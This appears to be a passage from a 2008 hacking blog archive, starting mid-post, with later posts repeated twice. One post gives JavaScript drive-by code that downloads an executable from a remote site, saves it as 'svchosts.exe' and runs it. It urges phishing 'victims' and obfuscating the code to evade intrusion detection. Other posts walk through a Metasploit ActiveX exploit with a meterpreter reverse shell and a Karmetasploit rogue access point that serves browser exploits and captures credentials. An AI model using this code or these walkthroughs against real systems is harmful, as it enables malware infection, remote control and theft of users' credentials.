We use document.createElement to create an element and use it in conjunction with setAttribute to modify the attributes of each new element. The classid in use is a Remote Data Service object. It allows the execution of code from a remote source. Search your registry and you'll see that it is assigned to RDS.DataSpace, a non-visual ActiveX control, which handles remote data connections. This function is part of Microsoft's MDAC.
We create our msxml2.XMLHTTP object which will handle communication with the web server that is hosting our executable.
Then we use the Object element to instantiate a Shell Object which is identified by the CLASSID.
The ADODB.Stream object in ActiveX, which contains methods to manage a stream of binary data or text, is used to handle the storing and saving of the data to a file.
Now let's grab the file, install it to a directory of our choice and run it.
try {
str.type = 1;
obj.open('GET','http://coolsite.com//innocent.exe',false);
obj.send();
str.open();
str.Write(obj.responseBody);
var path = './/..//svchosts.exe';
str.SaveToFile(path,2);
str.Close();
}
catch(e) {}
First we use the Type property to set the type of data in the stream object. 1 is for Binary.
Next we use the XMLHTTPRequest Open Method intialize an MSXML2.XMLHTTP request in which we specify the retrieval method, URL and authentication information if any. The XMLHTTPRequest Send Method allows us to send the HTTP request to the server.
The ADODB.stream Open Method is used to create and open a Stream opject. The ADODB.stream Write Method is used to write the binary data to a binary Stream object. After specifying the path we now use the ADODB.stream SaveToFile method is used to save contents of our open Stream object to a local file of our choosing. In this case we use am option value of 2 that overwrites the file if it already exists. We then close the object.
The next step is to use our Shell Object to execute our newly downloaded executable using the shellexecute function.
try {
app.shellexecute(path);
}
catch(e) {}
}
catch(e) {}
}
Place this code in a webpage either directly or through an include, create a good phishing email (see other posts) and send it off to your victims. Before anyone makes mention that this requires ActiveX to run remember that enough users will allow ActiveX controls to be run for it to be useful. On I.E. 6 this should perform a silent download and on I.E. 7 it will prompt the user.
You can add additional code to the page to check the browser version and prompt the user to either change to IE or have a direct link to the file for the user to click and run. Remember it just takes one user that follows the link to give you access.
One other thing to consider is IDS/IPS evasion. The code above will likely get flagged by an IDS in the form it is now. Look at JavaScript obfuscation techniques such as 'string-splitting', arguments.callee() and other methods to evade the IDS or just hide your code.
Variants of this method we have just discussed are actually widely used by malware authors on their sites to drop files onto users systems. Have a look at the next spam email you get and decode the JavaScript on the page.
Cheers,
Saturday, August 23, 2008
Metasploit and File Format Bugs
Client-side attacks are where its at and being able to send a legitimate looking file to a user to do their double-clicky thing on is the bomb.
MC has released a FileFormat mixin for metasploit which allows you to exploit fun bugs like 08-011 and other bugs that involve a user opening some sort of attachment.
Here is the link the fileformat mixin
http://www.metasploit.com/users/mc/rand/fileformat.rb
To use it, you need to add:
require 'msf/core/exploit/fileformat' to msf3/lib/msf/core/exploit.rb
and stick fileformat.rb in the msf3/lib/msf/core/exploit/ directory
Now remembering my previous post on adding exploits to metasploit we can do the same for mixins.
so my exploit.rb file actually said:
require '/home/cg/.msf3/lib/msf/core/exploit/fileformat'
And don't worry, if you jacked something up Metasploit will let you know.
cg@WPAD:~/evil/msf3$ ./msfconsole
./lib/msf/core/exploit.rb:241:in `require': no such file to load --
/home/cg/.msf3/lib/msf/core/exploit/fileformat (LoadError)
For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan
http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb
From the description in the module:
This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.
Example Time!
msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info
Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
Version: $Revision:$
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
MC
Available targets:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.
Payload information:
Space: 1024
Avoid: 1 characters
Description:
This module exploits a stack overflow in CA eTrust PestPatrol. When
sending an overly long string to the Initialize() property of
ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary
code. This control is not marked safe for scripting, so choose your
attack vector accordingly.
References:
http://www.w00t-shell.net/#
http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm
msf exploit(etrust_pestscan) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html
msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(etrust_pestscan) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(etrust_pestscan) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME DEMO.html no The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
DLL /home/cg/evil/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.101 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler
[*] Creating HTML file ...
[*] File is located in ./data/exploits/ ...
msf exploit(etrust_pestscan) >
Fileformat bugs are going to you to require to run the multi/handler so you can catch the return shells.
cg@WPAD:~/evil/msf3$ ./msfcli
Usage: ./msfcli [mode]
====================================================
Mode Description
---- -----------
(H)elp You're looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
cg@WPAD:~/evil/msf3$ ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler...
***Work your magic to get the client to open the html file***
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)
meterpreter >
MC has released a FileFormat mixin for metasploit which allows you to exploit fun bugs like 08-011 and other bugs that involve a user opening some sort of attachment.
Here is the link the fileformat mixin
http://www.metasploit.com/users/mc/rand/fileformat.rb
To use it, you need to add:
require 'msf/core/exploit/fileformat' to msf3/lib/msf/core/exploit.rb
and stick fileformat.rb in the msf3/lib/msf/core/exploit/ directory
Now remembering my previous post on adding exploits to metasploit we can do the same for mixins.
so my exploit.rb file actually said:
require '/home/cg/.msf3/lib/msf/core/exploit/fileformat'
And don't worry, if you jacked something up Metasploit will let you know.
cg@WPAD:~/evil/msf3$ ./msfconsole
./lib/msf/core/exploit.rb:241:in `require': no such file to load --
/home/cg/.msf3/lib/msf/core/exploit/fileformat (LoadError)
For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan
http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb
From the description in the module:
This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.
Example Time!
msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info
Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
Version: $Revision:$
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
MC
Available targets:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.
Payload information:
Space: 1024
Avoid: 1 characters
Description:
This module exploits a stack overflow in CA eTrust PestPatrol. When
sending an overly long string to the Initialize() property of
ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary
code. This control is not marked safe for scripting, so choose your
attack vector accordingly.
References:
http://www.w00t-shell.net/#
http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm
msf exploit(etrust_pestscan) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html
msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(etrust_pestscan) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(etrust_pestscan) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME DEMO.html no The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
DLL /home/cg/evil/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.101 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7
msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler
[*] Creating HTML file ...
[*] File is located in ./data/exploits/ ...
msf exploit(etrust_pestscan) >
Fileformat bugs are going to you to require to run the multi/handler so you can catch the return shells.
cg@WPAD:~/evil/msf3$ ./msfcli
Usage: ./msfcli
====================================================
Mode Description
---- -----------
(H)elp You're looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
cg@WPAD:~/evil/msf3$ ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler...
***Work your magic to get the client to open the html file***
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)
meterpreter >
Thursday, August 14, 2008
Metasploit + Karma=Karmetasploit Part 1
HD Moore released some documentation to get karmetasploit working with the framework.
First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch,(I used the 2nd patch), so apply that before you make/make install.
You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue.
Let's do our aireplay-ng test to see if things are working:
root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...
19:55:44 Injection is working!
19:55:46 Found 5 APs
19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'
19:55:52 0/30: 0%
19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%
19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80
19:56:03 5/30: 16%
19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'
19:56:09 0/30: 0%
19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%
Look's like we are good.
Now just follow the steps in the documentation, I installed dhcpd3 and set up my conf file, I did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.
With all the config files set up its pretty easy to get things going.
root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...
airbase-ng creates an at0 tap so you have to configure it and set the mtu size (all this if from the karmetasploit documentation)
root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0
root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400
root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800
After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.
root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net
After that we run our karma.rc file within using msfconsole.
root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 5353
SRVPORT => 5353
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 53
SRVPORT => 53
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >
Next post we'll see karmetasploit in action.
First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch,(I used the 2nd patch), so apply that before you make/make install.
You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue.
Let's do our aireplay-ng test to see if things are working:
root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...
19:55:44 Injection is working!
19:55:46 Found 5 APs
19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'
19:55:52 0/30: 0%
19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%
19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80
19:56:03 5/30: 16%
19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'
19:56:09 0/30: 0%
19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%
Look's like we are good.
Now just follow the steps in the documentation, I installed dhcpd3 and set up my conf file, I did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.
With all the config files set up its pretty easy to get things going.
root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...
airbase-ng creates an at0 tap so you have to configure it and set the mtu size (all this if from the karmetasploit documentation)
root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0
root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400
root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800
After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.
root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net
After that we run our karma.rc file within using msfconsole.
root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 5353
SRVPORT => 5353
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 53
SRVPORT => 53
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >
Next post we'll see karmetasploit in action.
Subscribe to:
Posts (Atom)